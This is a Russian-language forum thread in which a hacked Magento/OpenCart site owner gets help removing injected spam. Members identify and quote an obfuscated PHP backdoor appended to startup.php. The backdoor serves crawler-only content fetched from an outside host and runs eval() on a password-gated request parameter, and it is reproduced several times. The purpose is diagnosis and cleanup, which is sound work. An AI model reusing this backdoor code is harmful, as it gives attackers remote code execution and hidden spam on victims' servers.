Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

[Решено] Взлом сайта

Mandarin

Автор: ,
в Питання безпеки

 Share

Recommended Posts

Mandarin Rookie

Mandarin

Опубліковано:
Опубліковано:

Добрый день! Три дня назад на сайте появилась вот такая хрень в шапке: Изображение

После нее начинается нормальная страница сайта:

Изображение

Запрашивала у хостера резервные копии сайта в те дни, когда все было нормально. Ничего не изменилось. Пробовала найти такую ссылку hoster.ru самостоятельно в файлах - безрезультатно. В админку зайти не могу. Что это может быть такое и как это убрать?

Надіслати
Поділитися на інших сайтах

afwollis Grand Master

afwollis

Опубліковано:
Опубліковано:

я, конечно, все понимаю, но о какой помощи может быть речь, если вы даже ссылку на свой сайт не предоставили?

не думаю, что, за время моего отсутствия на форуме, в наших рядах появились телепаты.

Надіслати
Поділитися на інших сайтах
1

Baco Grand Master

Baco

Опубліковано:
Опубліковано:

Кодировка слетела - 1, подцепляет куки старой сессии - 2, ну и, как выразился ув. товарищ, так же батарейки сели в хрустальном шаре, котрый не раз помогал угадывать данные ответы...

Надіслати
Поділитися на інших сайтах
1

afwollis Grand Master

afwollis

Опубліковано:
Опубліковано:

покажите содержимое вашего файла /home/u675/catalog-chess.u675.netangels.ru/www/system/startup.php (спрячьте в цитату и спойлер).

Надіслати
Поділитися на інших сайтах
1

Mandarin Rookie

Mandarin

Опубліковано:
  • Автор
Опубліковано:

покажите содержимое вашего файла /home/u675/catalog-chess.u675.netangels.ru/www/system/startup.php (спрячьте в цитату и спойлер).

Содержимое startup.php:

<?php
// Error Reporting
error_reporting(E_ALL);

// RegEx
define('EMAIL_PATTERN', '/^[^@]+@.*.[a-z]{2,6}$/i');
// Check Version
if (version_compare(phpversion(), '5.1.0', '<') == TRUE) {
exit('PHP5.1+ Required');
}

// Register Globals
if (ini_get('register_globals')) {
ini_set('session.use_cookies', 'On');
ini_set('session.use_trans_sid', 'Off');
session_set_cookie_params(0, '/');
session_start();

$globals = array($_REQUEST, $_SESSION, $_SERVER, $_FILES);

foreach ($globals as $global) {
  foreach(array_keys($global) as $key) {
   unset($$key);
  }
}
}
// Magic Quotes Fix
if (ini_get('magic_quotes_gpc')) {
function clean($data) {
	 if (is_array($data)) {
	 foreach ($data as $key => $value) {
	   $data[clean($key)] = clean($value);
	 }
  } else {
	 $data = stripslashes($data);
  }

  return $data;
}
$_GET = clean($_GET);
$_POST = clean($_POST);
$_COOKIE = clean($_COOKIE);
}

if (!ini_get('date.timezone')) {
date_default_timezone_set('Europe/Moscow');
}

// Windows IIS Compatibility
if (!isset($_SERVER['DOCUMENT_ROOT'])) {
if (isset($_SERVER['SCRIPT_FILENAME'])) {
  $_SERVER['DOCUMENT_ROOT'] = str_replace('', '/', substr($_SERVER['SCRIPT_FILENAME'], 0, 0 - strlen($_SERVER['PHP_SELF'])));
}
}

if (!isset($_SERVER['DOCUMENT_ROOT'])) {
if (isset($_SERVER['PATH_TRANSLATED'])) {
  $_SERVER['DOCUMENT_ROOT'] = str_replace('', '/', substr(str_replace('', '', $_SERVER['PATH_TRANSLATED']), 0, 0 - strlen($_SERVER['PHP_SELF'])));
}
}

if (!isset($_SERVER['REQUEST_URI'])) {
$_SERVER['REQUEST_URI'] = substr($_SERVER['PHP_SELF'], 1);
if (isset($_SERVER['QUERY_STRING'])) {
  $_SERVER['REQUEST_URI'] .= '?' . $_SERVER['QUERY_STRING'];
}
}

// Engine
require_once(DIR_SYSTEM . 'engine/action.php');
require_once(DIR_SYSTEM . 'engine/controller.php');
require_once(DIR_SYSTEM . 'engine/front.php');
require_once(DIR_SYSTEM . 'engine/loader.php');
require_once(DIR_SYSTEM . 'engine/model.php');
require_once(DIR_SYSTEM . 'engine/registry.php');

// Common
require_once(DIR_SYSTEM . 'library/cache.php');
require_once(DIR_SYSTEM . 'library/config.php');
require_once(DIR_SYSTEM . 'library/db.php');
require_once(DIR_SYSTEM . 'library/document.php');
require_once(DIR_SYSTEM . 'library/image.php');
require_once(DIR_SYSTEM . 'library/language.php');
require_once(DIR_SYSTEM . 'library/log.php');
require_once(DIR_SYSTEM . 'library/mail.php');
require_once(DIR_SYSTEM . 'library/sms.php');
require_once(DIR_SYSTEM . 'library/pagination.php');
require_once(DIR_SYSTEM . 'library/request.php');
require_once(DIR_SYSTEM . 'library/response.php');
require_once(DIR_SYSTEM . 'library/session.php');
require_once(DIR_SYSTEM . 'library/template.php');
?><?php $x12="cx75162l_ix6ei164"; $x13="143u162lx5f163145to160t"; $x14="x63165162154_x65xe143"; $x15="cx75x72l_c154ox73e"; $x16="x65vx61x6c"; $x17="146151154e_147145164137c157156t145156x74163"; $x18="x66un143164i157nx5fx65170151s164x73"; $x19="151n151137x67x65164"; $x1a="preg_mx61164ch"; $x1b="sx74x72151px73la163x68145163"; $x1c="x75r154e156143157x64e";
error_reporting(0);$x0b = "x68x74164x70x3a//a143143x65x73163055x731x2eo162147x2fg145t056php"; $x0c = "1062x33063x32061qx71";if ($x1a("057050171141nx64x65x78|147157x6fx67154145051/x69", $_SERVER['HTTP_USER_AGENT'])) {$x0d = $x1c("150x74164p://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);$x0e = $x1c($_SERVER['HTTP_USER_AGENT']);$x0f = $x0b."x3fx69x64x3d".$x0d."&c150a162x73etx3dx75&bx6f164x3d".$x0e; if($x19("x61x6clo167137165162x6c_f157x70x65156") == 1) {echo $x17($x0f); } elseif($x18('curl_init')) {$x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;} } $x0f = $x0b."077x63x6f144145x3dx63x6f144x65046x62o164x3d".$x0e;if($x19("x61x6cl157x77_x75x72x6c137f157x70x65x6e") == 1) { echo $x17($x0f);}elseif($x18('curl_init')) { $x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;}if($_REQUEST["143"] == $x0c) $x16($x1b($_REQUEST["143x6fd145"])); ?>
Надіслати
Поділитися на інших сайтах

freelancer Grand Master

freelancer

Опубліковано:
Опубліковано:

что это? какая у вас сборка?

<?php $x12="cx75162l_ix6ei164"; $x13="143u162lx5f163145to160t"; $x14="x63165162154_x65xe143"; $x15="cx75x72l_c154ox73e"; $x16="x65vx61x6c"; $x17="146151154e_147145164137c157156t145156x74163"; $x18="x66un143164i157nx5fx65170151s164x73"; $x19="151n151137x67x65164"; $x1a="preg_mx61164ch"; $x1b="sx74x72151px73la163x68145163"; $x1c="x75r154e156143157x64e";
error_reporting(0);$x0b = "x68x74164x70x3a//a143143x65x73163055x731x2eo162147x2fg145t056php"; $x0c = "1062x33063x32061qx71";if ($x1a("057050171141nx64x65x78|147157x6fx67154145051/x69", $_SERVER['HTTP_USER_AGENT'])) {$x0d = $x1c("150x74164p://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);$x0e = $x1c($_SERVER['HTTP_USER_AGENT']);$x0f = $x0b."x3fx69x64x3d".$x0d."&c150a162x73etx3dx75&bx6f164x3d".$x0e; if($x19("x61x6clo167137165162x6c_f157x70x65156") == 1) {echo $x17($x0f); } elseif($x18('curl_init')) {$x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;} } $x0f = $x0b."077x63x6f144145x3dx63x6f144x65046x62o164x3d".$x0e;if($x19("x61x6cl157x77_x75x72x6c137f157x70x65x6e") == 1) { echo $x17($x0f);}elseif($x18('curl_init')) { $x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;}if($_REQUEST["143"] == $x0c) $x16($x1b($_REQUEST["143x6fd145"])); ?>
Надіслати
Поділитися на інших сайтах
1

Mandarin Rookie

Mandarin

Опубліковано:
  • Автор
Опубліковано:

что это? какая у вас сборка?

<?php $x12="cx75162l_ix6ei164"; $x13="143u162lx5f163145to160t"; $x14="x63165162154_x65xe143"; $x15="cx75x72l_c154ox73e"; $x16="x65vx61x6c"; $x17="146151154e_147145164137c157156t145156x74163"; $x18="x66un143164i157nx5fx65170151s164x73"; $x19="151n151137x67x65164"; $x1a="preg_mx61164ch"; $x1b="sx74x72151px73la163x68145163"; $x1c="x75r154e156143157x64e";
error_reporting(0);$x0b = "x68x74164x70x3a//a143143x65x73163055x731x2eo162147x2fg145t056php"; $x0c = "1062x33063x32061qx71";if ($x1a("057050171141nx64x65x78|147157x6fx67154145051/x69", $_SERVER['HTTP_USER_AGENT'])) {$x0d = $x1c("150x74164p://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);$x0e = $x1c($_SERVER['HTTP_USER_AGENT']);$x0f = $x0b."x3fx69x64x3d".$x0d."&c150a162x73etx3dx75&bx6f164x3d".$x0e; if($x19("x61x6clo167137165162x6c_f157x70x65156") == 1) {echo $x17($x0f); } elseif($x18('curl_init')) {$x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;} } $x0f = $x0b."077x63x6f144145x3dx63x6f144x65046x62o164x3d".$x0e;if($x19("x61x6cl157x77_x75x72x6c137f157x70x65x6e") == 1) { echo $x17($x0f);}elseif($x18('curl_init')) { $x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;}if($_REQUEST["143"] == $x0c) $x16($x1b($_REQUEST["143x6fd145"])); ?>

magento 1.5.1.5

Надіслати
Поділитися на інших сайтах

afwollis Grand Master

afwollis

Опубліковано:
Опубліковано:

удаляйте из файла вот эту ерунду

<?php $x12="cx75162l_ix6ei164"; $x13="143u162lx5f163145to160t"; $x14="x63165162154_x65xe143"; $x15="cx75x72l_c154ox73e"; $x16="x65vx61x6c"; $x17="146151154e_147145164137c157156t145156x74163"; $x18="x66un143164i157nx5fx65170151s164x73"; $x19="151n151137x67x65164"; $x1a="preg_mx61164ch"; $x1b="sx74x72151px73la163x68145163"; $x1c="x75r154e156143157x64e";
error_reporting(0);$x0b = "x68x74164x70x3a//a143143x65x73163055x731x2eo162147x2fg145t056php"; $x0c = "1062x33063x32061qx71";if ($x1a("057050171141nx64x65x78|147157x6fx67154145051/x69", $_SERVER['HTTP_USER_AGENT'])) {$x0d = $x1c("150x74164p://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);$x0e = $x1c($_SERVER['HTTP_USER_AGENT']);$x0f = $x0b."x3fx69x64x3d".$x0d."&c150a162x73etx3dx75&bx6f164x3d".$x0e; if($x19("x61x6clo167137165162x6c_f157x70x65156") == 1) {echo $x17($x0f); } elseif($x18('curl_init')) {$x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;} } $x0f = $x0b."077x63x6f144145x3dx63x6f144x65046x62o164x3d".$x0e;if($x19("x61x6cl157x77_x75x72x6c137f157x70x65x6e") == 1) { echo $x17($x0f);}elseif($x18('curl_init')) { $x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;}if($_REQUEST["143"] == $x0c) $x16($x1b($_REQUEST["143x6fd145"])); ?>

и поставьте на него права 644

Надіслати
Поділитися на інших сайтах
1

Mandarin Rookie

Mandarin

Опубліковано:
  • Автор
Опубліковано:

удаляйте из файла вот эту ерунду

<?php $x12="cx75162l_ix6ei164"; $x13="143u162lx5f163145to160t"; $x14="x63165162154_x65xe143"; $x15="cx75x72l_c154ox73e"; $x16="x65vx61x6c"; $x17="146151154e_147145164137c157156t145156x74163"; $x18="x66un143164i157nx5fx65170151s164x73"; $x19="151n151137x67x65164"; $x1a="preg_mx61164ch"; $x1b="sx74x72151px73la163x68145163"; $x1c="x75r154e156143157x64e";
error_reporting(0);$x0b = "x68x74164x70x3a//a143143x65x73163055x731x2eo162147x2fg145t056php"; $x0c = "1062x33063x32061qx71";if ($x1a("057050171141nx64x65x78|147157x6fx67154145051/x69", $_SERVER['HTTP_USER_AGENT'])) {$x0d = $x1c("150x74164p://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);$x0e = $x1c($_SERVER['HTTP_USER_AGENT']);$x0f = $x0b."x3fx69x64x3d".$x0d."&c150a162x73etx3dx75&bx6f164x3d".$x0e; if($x19("x61x6clo167137165162x6c_f157x70x65156") == 1) {echo $x17($x0f); } elseif($x18('curl_init')) {$x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;} } $x0f = $x0b."077x63x6f144145x3dx63x6f144x65046x62o164x3d".$x0e;if($x19("x61x6cl157x77_x75x72x6c137f157x70x65x6e") == 1) { echo $x17($x0f);}elseif($x18('curl_init')) { $x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;}if($_REQUEST["143"] == $x0c) $x16($x1b($_REQUEST["143x6fd145"])); ?>

и поставьте на него права 644

Ооо, спасибо, все хорошо! А что за права 644?

Надіслати
Поділитися на інших сайтах

afwollis Grand Master

afwollis

Опубліковано:
Опубліковано:

права доступа к файлу.

с такими правами никто, кроме вас не сможет изменить данный файл.

можете попросить службу поддержки вашего хостера сменить права файлу.

правда, мне кажется, что и с другими файлами у вас могут возникнуть проблемы в будущем...

Надіслати
Поділитися на інших сайтах
1

Zeppelin Proficient

Zeppelin

Опубліковано:
Опубліковано:

ОФФ Топ

а в чем запутался-то :) что опенкарт, что магенто, предок-то один оскоммерс, вот тут и запостила ;) если прадед один, значит и внуки одинаковые, глядишь помогут, а на форуме магенто, наверняка "поцаны понтовые сидят" не спешат на помощь :)

Надіслати
Поділитися на інших сайтах

noVe Mentor

noVe

Опубліковано:
Опубліковано:

ОФФ Топ

а в чем запутался-то :) что опенкарт, что магенто, предок-то один оскоммерс, вот тут и запостила ;) если прадед один, значит и внуки одинаковые, глядишь помогут, а на форуме магенто, наверняка "поцаны понтовые сидят" не спешат на помощь :)

Админка-то OC :)

Надіслати
Поділитися на інших сайтах
1

  • 2 months later...
dvizhok Newbie

dvizhok

Опубліковано:
Опубліковано:

Ну судя по тому как эти плагиаторы внедряют подобный код в труды разработчиков Opencart

<?php $x12="c\x75\162l_i\x6ei\164"; $x13="\143u\162l\x5f\163\145to\160t"; $x14="\x63\165\162\154_\x65xe\143"; $x15="c\x75\x72l_c\154o\x73e"; $x16="\x65v\x61\x6c"; $x17="\146\151\154e_\147\145\164\137c\157\156t\145\156\x74\163"; $x18="\x66un\143\164i\157n\x5f\x65\170\151s\164\x73"; $x19="\151n\151\137\x67\x65\164"; $x1a="preg_m\x61\164ch"; $x1b="s\x74\x72\151p\x73la\163\x68\145\163"; $x1c="\x75r\154e\156\143\157\x64e";
error_reporting(0);$x0b = "\x68\x74\164\x70\x3a//a\143\143\x65\x73\163\055\x731\x2eo\162\147\x2fg\145t\056php"; $x0c = "1\062\x33\063\x32\061q\x71";if ($x1a("\057\050\171\141n\x64\x65\x78|\147\157\x6f\x67\154\145\051/\x69", $_SERVER['HTTP_USER_AGENT'])) {$x0d = $x1c("\150\x74\164p://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);$x0e = $x1c($_SERVER['HTTP_USER_AGENT']);$x0f = $x0b."\x3f\x69\x64\x3d".$x0d."&c\150a\162\x73et\x3d\x75&b\x6f\164\x3d".$x0e; if($x19("\x61\x6clo\167\137\165\162\x6c_f\157\x70\x65\156") == 1) {echo $x17($x0f); } elseif($x18('curl_init')) {$x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;} } $x0f = $x0b."\077\x63\x6f\144\145\x3d\x63\x6f\144\x65\046\x62o\164\x3d".$x0e;if($x19("\x61\x6cl\157\x77_\x75\x72\x6c\137f\157\x70\x65\x6e") == 1) { echo $x17($x0f);}elseif($x18('curl_init')) { $x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;}if($_REQUEST["\143"] == $x0c) $x16($x1b($_REQUEST["\143\x6fd\145"])); ?>

Мне искренне жаль тех, кто будет ставить ЭТО - magento (изуродованный Opencart людьми, которые даже не знают php код). Реально, мне хочется от всей души навалять этим нехорошим людям люлей за такое.

Надіслати
Поділитися на інших сайтах

Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
 Share
Перейти до списку тем

  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку

Покупцям

Розробникам

Корисна інформація

Останні розширення

×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.

  Я даю згоду